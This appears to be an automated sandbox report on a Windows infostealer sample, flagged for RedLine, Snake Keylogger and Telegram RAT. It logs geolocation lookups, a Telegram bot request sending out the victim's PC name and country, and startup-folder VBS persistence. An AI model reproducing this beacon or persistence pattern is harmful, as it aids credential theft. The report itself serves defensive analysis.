                                                                                                                2025-01-10 14:34:02 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                17192.168.2.549795104.21.32.14436572C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 14:34:03 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 14:34:04 UTC855INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 14:34:04 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 1834433
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t9mJ4RiLbSr8mI6wKTuXMvv4m6%2BzrYbJuZN9igpXg26AS51VvfrgfRocMB0SFKHOMJg%2BOAJDrKBj1Kwct6Joglp%2FVa1I91ej6zCXKFVeWf3kQur3LYIDGQVXzKhtrQXJD1nrZgIO"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8ffd62bf580141a6-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1599&min_rtt=1595&rtt_var=606&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1792510&cwnd=241&unsent_bytes=0&cid=8a7332d7c85af7ba&ts=163&x=0"
                                                                                                                2025-01-10 14:34:04 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                18192.168.2.549806104.21.32.14436572C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 14:34:05 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 14:34:05 UTC851INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 14:34:05 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 1834434
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7AHEAcRk0yJFIk0M3gM8nEa08m72QKF4hmNSTF91SqhaH8YFDpCqWa60DyfYgpL3nVWe5WNs5oXjTQB7igTWE4%2B5s7fKzqCnUiKdcXBcFaBCkb7Us6Ius9KDP85B7TBr2rDP6S1n"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8ffd62c778b08cda-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1862&min_rtt=1859&rtt_var=703&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1550716&cwnd=243&unsent_bytes=0&cid=a7b6c95f52175460&ts=152&x=0"
                                                                                                                2025-01-10 14:34:05 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                19192.168.2.549812149.154.167.2204436572C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 14:34:06 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20and%20Time:%2010/01/2025%20/%2021:38:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20960781%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                Host: api.telegram.org
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 14:34:06 UTC344INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 14:34:06 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 55
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2025-01-10 14:34:06 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                Statistics

                                                                                                                CPU Usage

                                                                                                                Click to jump to process

                                                                                                                Memory Usage

                                                                                                                Click to jump to process

                                                                                                                High Level Behavior Distribution

                                                                                                                Click to dive into process behavior distribution

                                                                                                                Behavior

                                                                                                                Click to jump to process

                                                                                                                System Behavior

                                                                                                                General

                                                                                                                Target ID:0
                                                                                                                Start time:09:33:36
                                                                                                                Start date:10/01/2025
                                                                                                                Path:C:\Users\user\Desktop\B7N48hmO78.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\B7N48hmO78.exe"
                                                                                                                Imagebase:0xde0000
                                                                                                                File size:649'216 bytes
                                                                                                                MD5 hash:80A64F0B8DF55D637E135F0EB4FB6B70
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:2
                                                                                                                Start time:09:33:37
                                                                                                                Start date:10/01/2025
                                                                                                                Path:C:\Users\user\AppData\Local\inhumate\demonetised.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\B7N48hmO78.exe"
                                                                                                                Imagebase:0xd20000
                                                                                                                File size:649'216 bytes
                                                                                                                MD5 hash:80A64F0B8DF55D637E135F0EB4FB6B70
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.2089442641.0000000001290000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                • Detection: 79%, ReversingLabs
                                                                                                                • Detection: 73%, Virustotal, Browse
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:3
                                                                                                                Start time:09:33:39
                                                                                                                Start date:10/01/2025
                                                                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\B7N48hmO78.exe"
                                                                                                                Imagebase:0x930000
                                                                                                                File size:46'504 bytes
                                                                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000003.00000002.4522422465.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4524898032.00000000052D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4527385906.0000000006353000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:4
                                                                                                                Start time:09:33:49
                                                                                                                Start date:10/01/2025
                                                                                                                Path:C:\Windows\System32\wscript.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\demonetised.vbs"
                                                                                                                Imagebase:0x7ff78dc90000
                                                                                                                File size:170'496 bytes
                                                                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:5
                                                                                                                Start time:09:33:49
                                                                                                                Start date:10/01/2025
                                                                                                                Path:C:\Users\user\AppData\Local\inhumate\demonetised.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\AppData\Local\inhumate\demonetised.exe"
                                                                                                                Imagebase:0xd20000
                                                                                                                File size:649'216 bytes
                                                                                                                MD5 hash:80A64F0B8DF55D637E135F0EB4FB6B70
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000005.00000002.2206920824.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:6
                                                                                                                Start time:09:33:51
                                                                                                                Start date:10/01/2025
                                                                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\AppData\Local\inhumate\demonetised.exe"
                                                                                                                Imagebase:0x930000
                                                                                                                File size:46'504 bytes
                                                                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000006.00000002.4522419092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.4527614360.0000000006223000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.4525232764.00000000051A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                Disassembly

                                                                                                                Reset < >

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:3.8%
                                                                                                                  Dynamic/Decrypted Code Coverage:0.4%
                                                                                                                  Signature Coverage:11.2%
                                                                                                                  Total number of Nodes:2000
                                                                                                                  Total number of Limit Nodes:59
                                                                                                                  execution_graph 93784 f02f90 93785 f02fa0 93784->93785 93786 f030ba LoadLibraryA 93785->93786 93789 f030ff VirtualProtect VirtualProtect 93785->93789 93787 f030d1 93786->93787 93787->93785 93791 f030e3 GetProcAddress 93787->93791 93790 f03164 93789->93790 93790->93790 93791->93787 93792 f030f9 ExitProcess 93791->93792 93793 e59c06 93804 dfd3be 93793->93804 93795 e59c1c 93803 e59c91 Mailbox 93795->93803 93885 de1caa 49 API calls 93795->93885 93798 e59cc5 93800 e5a7ab Mailbox 93798->93800 93887 e2cc5c 86 API calls 4 library calls 93798->93887 93801 e59c71 93801->93798 93886 e2b171 48 API calls 93801->93886 93813 df3200 93803->93813 93805 dfd3dc 93804->93805 93806 dfd3ca 93804->93806 93807 dfd40b 93805->93807 93808 dfd3e2 93805->93808 93888 dedcae 50 API calls Mailbox 93806->93888 93898 dedcae 50 API calls Mailbox 93807->93898 93889 dff4ea 93808->93889 93812 dfd3d4 93812->93795 93921 debd30 93813->93921 93815 df3267 93816 df32f8 93815->93816 93817 e5907a 93815->93817 93883 df3628 93815->93883 93994 dfc36b 86 API calls 93816->93994 94029 e2cc5c 86 API calls 4 library calls 93817->94029 93821 e594df 93821->93883 94064 e2cc5c 86 API calls 4 library calls 93821->94064 93823 df3313 93823->93821 93834 df34eb Mailbox ___crtGetEnvironmentStringsW 93823->93834 93823->93883 93926 de2b7a 93823->93926 93824 dfc3c3 48 API calls 93824->93834 93828 e5926d 94048 e2cc5c 86 API calls 4 library calls 93828->94048 93829 e5909a 93870 e591fa 93829->93870 94030 ded645 93829->94030 93831 defe30 335 API calls 93833 e59407 93831->93833 93833->93883 94053 ded6e9 93833->94053 93834->93824 93834->93828 93834->93829 93851 e59438 93834->93851 93868 df351f 93834->93868 93871 dff4ea 48 API calls 93834->93871 93874 e59394 93834->93874 93877 e593c5 93834->93877 93834->93883 93996 ded9a0 53 API calls __cinit 93834->93996 93997 ded8c0 53 API calls 93834->93997 93998 dfc2d6 48 API calls ___crtGetEnvironmentStringsW 93834->93998 93999 defe30 93834->93999 94049 e3cda2 82 API calls Mailbox 93834->94049 94050 e280e3 53 API calls 93834->94050 94051 ded764 55 API calls 93834->94051 94052 dedcae 50 API calls Mailbox 93834->94052 93837 df33ce 93837->93834 93843 df3465 93837->93843 93844 e5945e 93837->93844 93839 e59114 93841 e59152 93839->93841 93848 e59128 93839->93848 93840 e59220 94045 de1caa 49 API calls 93840->94045 93860 e59177 93841->93860 93863 e59195 93841->93863 93850 dff4ea 48 API calls 93843->93850 94058 e2c942 50 API calls 93844->94058 94040 e2cc5c 86 API calls 4 library calls 93848->94040 93864 df346c 93850->93864 94057 e2cc5c 86 API calls 4 library calls 93851->94057 93852 e5923d 93855 e59252 93852->93855 93856 e5925e 93852->93856 94046 e2cc5c 86 API calls 4 library calls 93855->94046 94047 e2cc5c 86 API calls 4 library calls 93856->94047 94041 e3f320 335 API calls 93860->94041 93865 e5918b 93863->93865 94042 e3f5ee 335 API calls 93863->94042 93864->93868 93933 dee8d0 93864->93933 93865->93883 94043 dfc2d6 48 API calls ___crtGetEnvironmentStringsW 93865->94043 93873 df3540 93868->93873 94059 de6eed 93868->94059 94044 e2cc5c 86 API calls 4 library calls 93870->94044 93871->93834 93878 e594b0 93873->93878 93881 df3585 93873->93881 93873->93883 93876 dff4ea 48 API calls 93874->93876 93876->93877 93877->93831 94063 dedcae 50 API calls Mailbox 93878->94063 93880 df3615 93995 dedcae 50 API calls Mailbox 93880->93995 93881->93821 93881->93880 93881->93883 93884 df3635 Mailbox 93883->93884 94028 e2cc5c 86 API calls 4 library calls 93883->94028 93884->93798 93885->93801 93886->93803 93887->93800 93888->93812 93892 dff4f2 __calloc_impl 93889->93892 93891 dff50c 93891->93812 93892->93891 93893 dff50e std::exception::exception 93892->93893 